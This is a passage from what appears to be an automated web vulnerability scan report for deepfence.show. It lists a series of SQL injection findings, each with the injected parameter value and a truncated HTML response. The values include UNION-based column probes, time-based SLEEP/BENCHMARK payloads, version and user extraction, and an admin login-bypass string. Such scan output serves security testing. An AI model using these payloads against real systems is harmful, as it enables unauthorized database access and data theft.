href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1009\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1010\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1011\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1012Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1013\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4,5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1014\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1015\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 14--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1016\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88\n)+CHAR(88)+CHAR(88)+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1017\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1018\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1019\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1020\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1021\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" or sleep(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1022\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"\n81dc9bdb52d04dc20036dbd8313ed055\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta 